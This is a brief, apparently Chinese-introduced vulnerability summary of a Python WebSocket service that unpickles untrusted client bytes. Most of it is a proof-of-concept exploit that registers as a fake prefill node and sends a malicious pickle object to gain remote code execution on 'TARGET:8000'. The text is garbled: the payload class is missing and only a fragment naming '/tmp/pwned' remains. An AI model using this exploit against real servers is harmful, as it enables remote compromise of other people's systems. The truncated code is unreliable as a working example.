以下是关于漏洞的关键信息简洁的Markdown格式化文本: python @app.websocket("/pd_register") async def register_and_keep_alive(websocket: WebSocket): await websocket.accept() ... try: while True: data = await websocket.receive_bytes() obj = pickle.loads(data) /tmp/pwned',)) async def exploit(target): async with websockets.connect(f'ws://{target}/pd_register') as ws: await ws.send(json.dumps({ "node_id": 9999, "client_ip_port": "127.0.0.1:9999", "mode": "prefill", "start_args": {}, })) await ws.send(pickle.dumps(RCE())) asyncio.run(exploit('TARGET:8000'))